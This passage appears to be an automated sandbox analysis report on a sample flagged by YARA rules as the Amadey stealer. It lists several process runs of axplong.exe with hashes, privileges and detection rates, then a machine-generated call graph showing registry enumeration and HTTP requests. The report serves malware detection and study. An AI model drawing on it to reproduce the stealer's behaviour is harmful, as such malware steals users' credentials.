                                                                  MD5 hash:73ACB4CC181ACA9525AB9F599500B9CA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.2190425127.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.2149476998.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:05:29:12
                                                                  Start date:27/09/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Imagebase:0x8f0000
                                                                  File size:1'923'072 bytes
                                                                  MD5 hash:73ACB4CC181ACA9525AB9F599500B9CA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.2179442160.0000000005020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.2220557064.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 55%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:05:29:12
                                                                  Start date:27/09/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                                  Imagebase:0x8f0000
                                                                  File size:1'923'072 bytes
                                                                  MD5 hash:73ACB4CC181ACA9525AB9F599500B9CA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000002.2220852652.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000003.2180250631.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:05:30:00
                                                                  Start date:27/09/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Imagebase:0x8f0000
                                                                  File size:1'923'072 bytes
                                                                  MD5 hash:73ACB4CC181ACA9525AB9F599500B9CA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000003.2651739897.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:false

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2192199639.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_4cd0000_file.jbxd

                                                                    Execution Graph

                                                                    Execution Coverage:9.1%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:17.6%
                                                                    Total number of Nodes:981
                                                                    Total number of Limit Nodes:78
14195->13989 14196 907870 RtlAllocateHeap 14196->14197 14197->14195 14197->14196 14198 8f5b20 RtlAllocateHeap 14197->14198 14199 8f8a50 14197->14199 14200 907f30 RtlAllocateHeap 14197->14200 14198->14197 14201 908070 RtlAllocateHeap 14199->14201 14200->14197 14201->14195 14204 8f5e28 14202->14204 14203 8f5f0e shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14203->13880 14204->14203 14205 907f30 RtlAllocateHeap 14204->14205 14206 8f5f99 14205->14206 14207 907f30 RtlAllocateHeap 14206->14207 14208 8f5fcd 14207->14208 14209 907f30 RtlAllocateHeap 14208->14209 14210 8f5ffe 14209->14210 14211 907f30 RtlAllocateHeap 14210->14211 14212 8f602f 14211->14212 14213 907f30 RtlAllocateHeap 14212->14213 14214 8f6060 RegOpenKeyExA 14213->14214 14215 8f645a shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14214->14215 14219 8f60b3 __cftof 14214->14219 14215->13880 14216 8f6153 RegEnumValueW 14216->14219 14219->14215 14219->14216 14220 907870 RtlAllocateHeap 14219->14220 14604 907c50 14219->14604 14617 908090 14219->14617 14220->14219 14222 8f8cb0 14221->14222 14223 907870 RtlAllocateHeap 14222->14223 14224 8f8cbf 14223->14224 14225 8f5b20 RtlAllocateHeap 14224->14225 14226 8f8cca 14225->14226 14227 907f30 RtlAllocateHeap 14226->14227 14228 8f8d1c 14227->14228 14229 908150 RtlAllocateHeap 14228->14229 14230 8f8d2e shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14229->14230 14230->13935 14232 8f8fb0 14231->14232 14233 907870 RtlAllocateHeap 14232->14233 14234 8f8fbf 14233->14234 14235 8f5b20 RtlAllocateHeap 14234->14235 14236 8f8fca 14235->14236 14236->14236 14237 907f30 RtlAllocateHeap 14236->14237 14238 8f901c 14237->14238 14239 908150 RtlAllocateHeap 14238->14239 14240 8f902e shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14239->14240 14240->13935 14242 8f8e2f 14241->14242 14243 907870 RtlAllocateHeap 14242->14243 14244 8f8e3f 14243->14244 14245 8f5b20 RtlAllocateHeap 14244->14245 14246 8f8e4a 
14245->14246 14247 907f30 RtlAllocateHeap 14246->14247 14248 8f8e9c 14247->14248 14249 908150 RtlAllocateHeap 14248->14249 14250 8f8eae shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14249->14250 14250->13935 14252 90c109 RtlAllocateHeap 14251->14252 14253 90807a 14252->14253 14253->13859 14634 90c019 14254->14634 14256 90c0da std::_Throw_future_error 14637 90c08d 14257->14637 14259 90c11a std::_Throw_future_error 14263 90d317 __cftof 14260->14263 14262 90d331 14262->14006 14263->14262 14264 8f2440 std::_Throw_future_error 14263->14264 14275 928aa4 14263->14275 14267 90d33d std::_Throw_future_error 14264->14267 14279 9237dc 14264->14279 14266 8f2483 14266->14006 14267->14006 14283 90c0e9 14268->14283 14272 8f244e std::_Throw_future_error 14271->14272 14273 9237dc ___std_exception_copy RtlAllocateHeap 14272->14273 14274 8f2483 14273->14274 14278 92af0b __cftof 14275->14278 14276 92af34 RtlAllocateHeap 14277 92af47 __dosmaperr 14276->14277 14276->14278 14277->14263 14278->14276 14278->14277 14280 9237e9 14279->14280 14282 923806 ___std_exception_destroy ___std_exception_copy 14279->14282 14281 928aa4 ___std_exception_copy RtlAllocateHeap 14280->14281 14280->14282 14281->14282 14282->14266 14286 90c053 14283->14286 14285 90c0fa std::_Throw_future_error 14289 8f22a0 14286->14289 14288 90c065 14288->14285 14290 9237dc ___std_exception_copy RtlAllocateHeap 14289->14290 14291 8f22d7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14290->14291 14291->14288 14318 907df0 14292->14318 14294 8f587b 14295 8f58f0 14294->14295 14296 907df0 RtlAllocateHeap 14295->14296 14309 8f5955 14296->14309 14297 907870 RtlAllocateHeap 14297->14309 14298 8f5aed __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14298->14023 14299 8f5b19 14300 908070 RtlAllocateHeap 14299->14300 14302 8f5b1e 14300->14302 14301 907f30 RtlAllocateHeap 14301->14309 14304 8f5850 RtlAllocateHeap 14302->14304 14305 8f5b64 14304->14305 14306 8f58f0 RtlAllocateHeap 14305->14306 
14307 8f5b7a 14306->14307 14308 8f4af0 RtlAllocateHeap 14307->14308 14310 8f5b8b shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14308->14310 14309->14297 14309->14298 14309->14299 14309->14301 14331 8f5640 14309->14331 14310->14023 14312 8f4b4e 14311->14312 14313 8f4b24 14311->14313 14316 907df0 RtlAllocateHeap 14312->14316 14314 907f30 RtlAllocateHeap 14313->14314 14315 8f4b3b __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14314->14315 14315->14025 14317 8f4bab __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14316->14317 14317->14025 14320 907e0e __cftof 14318->14320 14322 907e37 14318->14322 14319 9091a0 RtlAllocateHeap 14321 907f28 14319->14321 14320->14294 14323 8f2440 RtlAllocateHeap 14321->14323 14324 907eae 14322->14324 14326 907e8b 14322->14326 14329 907e9c __cftof 14322->14329 14325 907f2d 14323->14325 14328 90d312 RtlAllocateHeap 14324->14328 14324->14329 14326->14321 14327 90d312 RtlAllocateHeap 14326->14327 14327->14329 14328->14329 14329->14319 14330 907f05 shared_ptr 14329->14330 14330->14294 14335 8f5770 shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14331->14335 14336 8f56a9 shared_ptr 14331->14336 14332 8f583a 14334 908070 RtlAllocateHeap 14332->14334 14333 907f30 RtlAllocateHeap 14333->14336 14334->14335 14335->14309 14336->14332 14336->14333 14336->14335 14338 9286e9 14337->14338 14342 9286fe __cftof __dosmaperr 14338->14342 14343 92683a 14338->14343 14341 92872e 14341->14342 14349 928925 14341->14349 14342->14029 14344 92685a 14343->14344 14345 926851 14343->14345 14344->14345 14355 92b4bb 14344->14355 14345->14341 14350 928962 14349->14350 14352 928932 14349->14352 14420 92d2e9 14350->14420 14353 928941 __fassign 14352->14353 14415 92d30d 14352->14415 14353->14341 14356 926890 14355->14356 14357 92b4ce 14355->14357 14359 92b4e8 14356->14359 14357->14356 14363 92f46b 14357->14363 14360 92b510 14359->14360 14361 92b4fb 14359->14361 14360->14345 14361->14360 14398 92e571 14361->14398 
14365 92f477 __cftof 14363->14365 14364 92f4c6 14364->14356 14365->14364 14368 928aaf 14365->14368 14367 92f4eb 14369 928ab4 __cftof 14368->14369 14372 928abf __cftof 14369->14372 14379 92d4f4 14369->14379 14376 92651d 14372->14376 14373 92d727 RtlAllocateHeap 14374 92d73a __dosmaperr 14373->14374 14375 928af2 __cftof 14373->14375 14374->14367 14375->14373 14375->14374 14386 9263f7 14376->14386 14381 92d500 __cftof 14379->14381 14380 92d55c __cftof __dosmaperr 14380->14372 14381->14380 14382 92651d __cftof 2 API calls 14381->14382 14385 92d6ee __cftof 14382->14385 14383 92d727 RtlAllocateHeap 14384 92d73a __dosmaperr 14383->14384 14383->14385 14384->14372 14385->14383 14385->14384 14387 926405 __cftof 14386->14387 14388 926450 14387->14388 14391 92645b 14387->14391 14388->14375 14396 92a1c2 GetPEB 14391->14396 14393 926465 14394 92646a GetPEB 14393->14394 14395 92647a __cftof 14393->14395 14394->14395 14397 92a1dc __cftof 14396->14397 14397->14393 14399 92e57b 14398->14399 14402 92e489 14399->14402 14401 92e581 14401->14360 14406 92e495 __cftof __freea 14402->14406 14403 92e4b6 14403->14401 14404 928aaf __cftof 4 API calls 14405 92e528 14404->14405 14407 92e564 14405->14407 14411 92a5ee 14405->14411 14406->14403 14406->14404 14407->14401 14412 92a611 14411->14412 14413 928aaf __cftof 4 API calls 14412->14413 14414 92a687 14413->14414 14416 92683a __cftof 5 API calls 14415->14416 14417 92d32a 14416->14417 14419 92d33a __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14417->14419 14424 92f07f 14417->14424 14419->14353 14421 92d2f4 14420->14421 14422 92b4bb __cftof 4 API calls 14421->14422 14423 92d304 14422->14423 14423->14353 14425 92683a __cftof 5 API calls 14424->14425 14426 92f09f __fassign 14425->14426 14428 92f0f2 __cftof __fassign __freea __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14426->14428 14429 92af0b 14426->14429 14428->14419 14431 92af47 __dosmaperr 14429->14431 14432 92af19 __cftof 14429->14432 14430 92af34 RtlAllocateHeap 
14430->14431 14430->14432 14431->14428 14432->14430 14432->14431 14434 9265ae __cftof 14433->14434 14435 9265b5 __cftof __dosmaperr 14434->14435 14437 92a783 14434->14437 14435->14032 14438 92a78f __cftof 14437->14438 14441 92a827 14438->14441 14440 92a7aa 14440->14435 14443 92a84a 14441->14443 14443->14443 14444 92a890 __freea 14443->14444 14445 92d6ef 14443->14445 14444->14440 14446 92d6fc __cftof 14445->14446 14447 92d727 RtlAllocateHeap 14446->14447 14448 92d73a __dosmaperr 14446->14448 14447->14446 14447->14448 14448->14444 14450 926692 14449->14450 14452 92667d __cftof __dosmaperr __freea 14449->14452 14450->14452 14453 929ef9 14450->14453 14452->14036 14454 929f36 14453->14454 14455 929f11 14453->14455 14454->14452 14455->14454 14457 9302f8 14455->14457 14458 930304 __cftof 14457->14458 14460 93030c __cftof __dosmaperr 14458->14460 14461 9303ea 14458->14461 14460->14454 14462 93040c 14461->14462 14464 930410 __cftof __dosmaperr 14461->14464 14462->14464 14465 92fb7f 14462->14465 14464->14460 14466 92fbcc 14465->14466 14467 92683a __cftof 5 API calls 14466->14467 14471 92fbdb __cftof 14467->14471 14468 92d2e9 4 API calls 14468->14471 14469 92fe7b __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14469->14464 14470 92c4ea 5 API calls __fassign 14470->14471 14471->14468 14471->14469 14471->14470 14473 908610 14472->14473 14473->14473 14481 9075d0 14473->14481 14475 908629 14477 908644 14475->14477 14493 908e70 14475->14493 14478 908e70 RtlAllocateHeap 14477->14478 14480 908699 14477->14480 14479 9086e1 14478->14479 14479->14039 14480->14039 14483 9075eb 14481->14483 14492 9076d4 shared_ptr 14481->14492 14482 90766b 14484 9091a0 RtlAllocateHeap 14482->14484 14482->14492 14483->14482 14488 90765a 14483->14488 14489 907681 14483->14489 14483->14492 14485 907766 14484->14485 14486 8f2440 RtlAllocateHeap 14485->14486 14487 90776b 14486->14487 14488->14485 14491 90d312 RtlAllocateHeap 14488->14491 14489->14482 14490 90d312 RtlAllocateHeap 14489->14490 
14490->14482 14491->14482 14492->14475 14494 908fbe 14493->14494 14497 908e9b 14493->14497 14495 9091a0 RtlAllocateHeap 14494->14495 14496 908fc3 14495->14496 14498 8f2440 RtlAllocateHeap 14496->14498 14499 908ee2 14497->14499 14500 908f0c 14497->14500 14504 908ef3 14498->14504 14499->14496 14501 908eed 14499->14501 14503 90d312 RtlAllocateHeap 14500->14503 14500->14504 14502 90d312 RtlAllocateHeap 14501->14502 14502->14504 14503->14504 14505 908fe8 14504->14505 14507 8f2440 std::_Throw_future_error 14504->14507 14508 908f7c shared_ptr 14504->14508 14506 90d312 RtlAllocateHeap 14505->14506 14506->14508 14509 9237dc ___std_exception_copy RtlAllocateHeap 14507->14509 14508->14477 14510 8f2483 14509->14510 14510->14477 14512 9091c4 14511->14512 14515 9091d5 14512->14515 14592 909410 14512->14592 14514 90925b 14514->14060 14515->14060 14517 9081c2 14516->14517 14518 908178 14516->14518 14521 9081d1 14517->14521 14523 908e70 RtlAllocateHeap 14517->14523 14518->14517 14519 908181 14518->14519 14520 9091b0 RtlAllocateHeap 14519->14520 14522 90818a 14520->14522 14521->14064 14522->14064 14523->14521 14525 8fbdb2 14524->14525 14526 8fc1a1 14524->14526 14525->14526 14528 8fbdc6 InternetOpenW InternetConnectA 14525->14528 14527 907f30 RtlAllocateHeap 14526->14527 14533 8fc14e shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14527->14533 14529 907870 RtlAllocateHeap 14528->14529 14530 8fbe3d 14529->14530 14531 8f5b20 RtlAllocateHeap 14530->14531 14532 8fbe48 HttpOpenRequestA 14531->14532 14537 8fbe71 shared_ptr 14532->14537 14533->14074 14535 907870 RtlAllocateHeap 14536 8fbed9 14535->14536 14538 8f5b20 RtlAllocateHeap 14536->14538 14537->14535 14539 8fbee4 14538->14539 14540 907870 RtlAllocateHeap 14539->14540 14541 8fbefd 14540->14541 14542 8f5b20 RtlAllocateHeap 14541->14542 14543 8fbf08 HttpSendRequestA 14542->14543 14546 8fbf2b shared_ptr 14543->14546 14545 8fbfb3 InternetReadFile 14547 8fbfda 14545->14547 14546->14545 14552 8f85d0 shared_ptr 
__ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14548->14552 14553 8f8505 shared_ptr 14548->14553 14549 8f8697 14551 908070 RtlAllocateHeap 14549->14551 14550 907f30 RtlAllocateHeap 14550->14553 14551->14552 14552->14083 14553->14549 14553->14550 14553->14552 14555 9075d0 RtlAllocateHeap 14554->14555 14556 908369 14555->14556 14557 908e70 RtlAllocateHeap 14556->14557 14558 908384 14556->14558 14557->14558 14559 908e70 RtlAllocateHeap 14558->14559 14561 9083d8 14558->14561 14560 90841e 14559->14560 14560->14089 14561->14089 14563 8f9504 14562->14563 14564 907f30 RtlAllocateHeap 14563->14564 14565 8f954c 14564->14565 14566 907870 RtlAllocateHeap 14565->14566 14576 8f9565 shared_ptr 14566->14576 14567 8f96cf 14569 8f972e 14567->14569 14570 8f9810 14567->14570 14568 907870 RtlAllocateHeap 14568->14576 14573 907f30 RtlAllocateHeap 14569->14573 14571 908070 RtlAllocateHeap 14570->14571 14574 8f9764 shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14571->14574 14572 8f5b20 RtlAllocateHeap 14572->14576 14573->14574 14574->14144 14575 907f30 RtlAllocateHeap 14575->14576 14576->14567 14576->14568 14576->14570 14576->14572 14576->14574 14576->14575 14578 8f91b4 14577->14578 14579 907f30 RtlAllocateHeap 14578->14579 14580 8f91fc 14579->14580 14581 907870 RtlAllocateHeap 14580->14581 14582 8f9215 shared_ptr 14581->14582 14583 8f937f 14582->14583 14584 907870 RtlAllocateHeap 14582->14584 14586 8f5b20 RtlAllocateHeap 14582->14586 14588 8f93f6 shared_ptr 14582->14588 14590 907f30 RtlAllocateHeap 14582->14590 14585 907f30 RtlAllocateHeap 14583->14585 14584->14582 14585->14588 14586->14582 14587 8f9473 shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14587->14146 14588->14587 14589 908070 RtlAllocateHeap 14588->14589 14591 8f94a8 14589->14591 14590->14582 14593 909549 14592->14593 14595 90943b 14592->14595 14594 9091a0 RtlAllocateHeap 14593->14594 14596 90954e 14594->14596 14598 909482 14595->14598 14599 9094a9 14595->14599 14597 
8f2440 RtlAllocateHeap 14596->14597 14603 909493 shared_ptr 14597->14603 14598->14596 14600 90948d 14598->14600 14602 90d312 RtlAllocateHeap 14599->14602 14599->14603 14601 90d312 RtlAllocateHeap 14600->14601 14601->14603 14602->14603 14603->14514 14607 907c71 14604->14607 14608 907c9c 14604->14608 14605 907d90 14606 9091a0 RtlAllocateHeap 14605->14606 14616 907d01 shared_ptr 14606->14616 14607->14219 14608->14605 14609 907d8b 14608->14609 14611 907cf0 14608->14611 14612 907d17 14608->14612 14610 8f2440 RtlAllocateHeap 14609->14610 14610->14605 14611->14609 14613 907cfb 14611->14613 14614 90d312 RtlAllocateHeap 14612->14614 14612->14616 14615 90d312 RtlAllocateHeap 14613->14615 14614->14616 14615->14616 14616->14219 14618 9075d0 RtlAllocateHeap 14617->14618 14620 9080e0 14618->14620 14619 908132 14619->14219 14620->14619 14622 908bd0 14620->14622 14623 908bf3 14622->14623 14624 908cf9 14622->14624 14627 908c35 14623->14627 14628 908c5f 14623->14628 14625 9091a0 RtlAllocateHeap 14624->14625 14626 908cfe 14625->14626 14629 8f2440 RtlAllocateHeap 14626->14629 14627->14626 14630 908c40 14627->14630 14632 90d312 RtlAllocateHeap 14628->14632 14633 908c46 shared_ptr 14628->14633 14629->14633 14631 90d312 RtlAllocateHeap 14630->14631 14631->14633 14632->14633 14633->14620 14635 8f22a0 std::invalid_argument::invalid_argument RtlAllocateHeap 14634->14635 14636 90c02b 14635->14636 14636->14256 14638 8f22a0 std::invalid_argument::invalid_argument RtlAllocateHeap 14637->14638 14639 90c09f 14638->14639 14639->14259 15770 90b85e 15775 90b6e5 15770->15775 15772 90b886 15783 90b648 15772->15783 15774 90b89f 15776 90b6f1 Concurrency::details::_Reschedule_chore 15775->15776 15778 90b722 15776->15778 15793 90c5dc 15776->15793 15778->15772 15781 90b70c __Mtx_unlock 15782 8f2ad0 12 API calls 15781->15782 15782->15778 15784 90b654 Concurrency::details::_Reschedule_chore 15783->15784 15785 90b6ae 15784->15785 15786 90c5dc GetSystemTimePreciseAsFileTime 15784->15786 15785->15774 15787 
90b669 15786->15787 15788 8f2ad0 12 API calls 15787->15788 15789 90b66f __Mtx_unlock 15788->15789 15790 8f2ad0 12 API calls 15789->15790 15791 90b68c __Cnd_broadcast 15790->15791 15791->15785 15792 8f2ad0 12 API calls 15791->15792 15792->15785 15803 90c382 15793->15803 15795 90b706 15796 8f2ad0 15795->15796 15797 8f2adc 15796->15797 15798 8f2ada 15796->15798 15820 90c19a 15797->15820 15798->15781 15804 90c3d8 15803->15804 15806 90c3aa __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 15803->15806 15804->15806 15809 90ce9b 15804->15809 15806->15795 15807 90c42d __Xtime_diff_to_millis2 15807->15806 15808 90ce9b _xtime_get GetSystemTimePreciseAsFileTime 15807->15808 15808->15807 15810 90ceb7 __aulldvrm 15809->15810 15811 90ceaa 15809->15811 15810->15807 15811->15810 15813 90ce74 15811->15813 15816 90cb1a 15813->15816 15817 90cb37 15816->15817 15818 90cb2b GetSystemTimePreciseAsFileTime 15816->15818 15817->15810 15818->15817 15821 90c1c2 15820->15821 15822 90c1a4 15820->15822 15821->15821 15822->15821 15824 90c1c7 15822->15824 15829 8f2aa0 15824->15829 15826 90c1de 15845 90c12f 15826->15845 15828 90c1ef std::_Throw_future_error 15828->15822 15851 90be0f 15829->15851 15831 8f2abf 15831->15826 15832 928aaf __cftof 4 API calls 15833 926c26 15832->15833 15834 926c43 15833->15834 15835 926c35 15833->15835 15837 9268bd 5 API calls 15834->15837 15836 926c99 11 API calls 15835->15836 15840 926c3f 15836->15840 15838 926c5d 15837->15838 15841 92681d RtlAllocateHeap 15838->15841 15839 8f2ab4 __cftof 15839->15831 15839->15832 15840->15826 15842 926c6a 15841->15842 15843 926c99 11 API calls 15842->15843 15844 926c71 __freea 15842->15844 15843->15844 15844->15826 15846 90c13b __EH_prolog3_GS 15845->15846 15847 907f30 RtlAllocateHeap 15846->15847 15848 90c16d 15847->15848 15858 8f2670 15848->15858 15850 90c182 15850->15828 15854 90cb61 15851->15854 15855 90cb6f InitOnceExecuteOnce 15854->15855 15857 90be22 15854->15857 15855->15857 15857->15839 15859 907870 RtlAllocateHeap 
15858->15859 15860 8f26c2 15859->15860 15861 8f26e5 15860->15861 15862 908e70 RtlAllocateHeap 15860->15862 15863 908e70 RtlAllocateHeap 15861->15863 15865 8f274e shared_ptr 15861->15865 15862->15861 15863->15865 15864 9237dc ___std_exception_copy RtlAllocateHeap 15866 8f280b shared_ptr ___std_exception_destroy __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 15864->15866 15865->15864 15865->15866 15866->15850 15905 908700 15906 90d312 RtlAllocateHeap 15905->15906 15907 90875a __cftof 15906->15907 15915 909ae0 15907->15915 15909 908784 15913 90879c __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 15909->15913 15919 8f43b0 15909->15919 15914 90880f 15916 909b15 15915->15916 15928 8f2ca0 15916->15928 15918 909b46 15918->15909 15920 90be0f InitOnceExecuteOnce 15919->15920 15921 8f43ca 15920->15921 15922 8f43d1 15921->15922 15923 926beb 11 API calls 15921->15923 15925 90bd80 15922->15925 15924 8f43e4 15923->15924 15982 90bcbb 15925->15982 15927 90bd96 std::_Throw_future_error 15927->15914 15929 8f2cdd 15928->15929 15930 90be0f InitOnceExecuteOnce 15929->15930 15931 8f2d06 15930->15931 15932 8f2d11 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 15931->15932 15933 8f2d48 15931->15933 15937 90be27 15931->15937 15932->15918 15946 8f2400 15933->15946 15938 90be33 15937->15938 15949 8f28c0 15938->15949 15940 90be53 std::_Throw_future_error 15941 90bea3 15940->15941 15942 90be9a 15940->15942 15944 8f2aa0 12 API calls 15941->15944 15957 90bdaf 15942->15957 15945 90be9f 15944->15945 15945->15933 15977 90b506 15946->15977 15948 8f2432 15950 907f30 RtlAllocateHeap 15949->15950 15951 8f290f 15950->15951 15952 8f2670 RtlAllocateHeap 15951->15952 15954 8f2927 15952->15954 15953 8f294d shared_ptr 15953->15940 15954->15953 15955 9237dc ___std_exception_copy RtlAllocateHeap 15954->15955 15956 8f29a4 15955->15956 15956->15940 15958 90cb61 InitOnceExecuteOnce 15957->15958 15959 90bdc7 15958->15959 15960 90bdce 15959->15960 15963 926beb 15959->15963 
15960->15945 15962 90bdd7 15962->15945 15964 926bf7 __cftof 15963->15964 15965 928aaf __cftof 4 API calls 15964->15965 15966 926c26 15965->15966 15967 926c43 15966->15967 15968 926c35 15966->15968 15970 9268bd 5 API calls 15967->15970 15969 926c99 11 API calls 15968->15969 15972 926c3f 15969->15972 15971 926c5d 15970->15971 15973 92681d RtlAllocateHeap 15971->15973 15972->15962 15974 926c6a 15973->15974 15975 926c99 11 API calls 15974->15975 15976 926c71 __freea 15974->15976 15975->15976 15976->15962 15979 90b521 std::_Throw_future_error 15977->15979 15978 90b588 __cftof __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 15978->15948 15979->15978 15980 928aaf __cftof 4 API calls 15979->15980 15981 90b5cf 15980->15981 15983 8f22a0 std::invalid_argument::invalid_argument RtlAllocateHeap 15982->15983 15984 90bccf 15983->15984 15984->15927 14640 926beb 14641 926bf7 __cftof 14640->14641 14642 928aaf __cftof 4 API calls 14641->14642 14643 926c26 14642->14643 14644 926c43 14643->14644 14645 926c35 14643->14645 14654 9268bd 14644->14654 14646 926c99 11 API calls 14645->14646 14649 926c3f 14646->14649 14648 926c5d 14657 92681d 14648->14657 14653 926c71 __freea 14655 92683a __cftof 5 API calls 14654->14655 14656 9268cf 14655->14656 14656->14648 14669 92676b 14657->14669 14659 926835 14659->14653 14660 926c99 14659->14660 14661 926cc4 __cftof 14660->14661 14667 926ca7 __cftof __dosmaperr 14660->14667 14662 926d06 CreateFileW 14661->14662 14668 926cea __cftof __dosmaperr 14661->14668 14663 926d2a 14662->14663 14664 926d38 14662->14664 14683 926e01 GetFileType 14663->14683 14697 926d77 14664->14697 14667->14653 14668->14653 14670 926793 14669->14670 14672 926779 __dosmaperr __fassign 14669->14672 14671 92679a 14670->14671 14674 9267b9 __fassign 14670->14674 14671->14672 14676 926916 14671->14676 14672->14659 14674->14672 14675 926916 RtlAllocateHeap 14674->14675 14675->14672 14677 926924 14676->14677 14680 926955 14677->14680 14681 92af0b __cftof RtlAllocateHeap 
14680->14681 14682 926935 14681->14682 14682->14672 14684 926e3c 14683->14684 14689 926ed2 __dosmaperr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14683->14689 14685 926e56 __cftof 14684->14685 14719 927177 14684->14719 14687 926e75 GetFileInformationByHandle 14685->14687 14685->14689 14688 926e8b 14687->14688 14687->14689 14705 9270c9 14688->14705 14689->14668 14693 926ea8 14694 926f71 SystemTimeToTzSpecificLocalTime 14693->14694 14695 926ebb 14694->14695 14696 926f71 SystemTimeToTzSpecificLocalTime 14695->14696 14696->14689 14738 927314 14697->14738 14699 926d85 14700 926d8a __dosmaperr 14699->14700 14701 9270c9 5 API calls 14699->14701 14700->14668 14702 926da3 14701->14702 14703 927177 RtlAllocateHeap 14702->14703 14704 926dc2 14703->14704 14704->14668 14707 9270df _wcsrchr 14705->14707 14706 926e97 14715 926f71 14706->14715 14707->14706 14723 92b9e4 14707->14723 14709 927123 14709->14706 14710 92b9e4 5 API calls 14709->14710 14711 927134 14710->14711 14711->14706 14712 92b9e4 5 API calls 14711->14712 14713 927145 14712->14713 14713->14706 14714 92b9e4 5 API calls 14713->14714 14714->14706 14716 926f89 14715->14716 14717 926fa9 SystemTimeToTzSpecificLocalTime 14716->14717 14718 926f8f __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14716->14718 14717->14718 14718->14693 14720 927190 14719->14720 14722 9271a4 __dosmaperr 14720->14722 14734 92b568 14720->14734 14722->14685 14725 92b9f2 14723->14725 14727 92b9f8 __cftof __dosmaperr 14725->14727 14728 92ba2d 14725->14728 14726 92ba28 14726->14709 14727->14709 14729 92ba57 14728->14729 14731 92ba3d __cftof __dosmaperr 14728->14731 14730 92683a __cftof 5 API calls 14729->14730 14729->14731 14733 92ba81 14730->14733 14731->14726 14732 92b9a5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 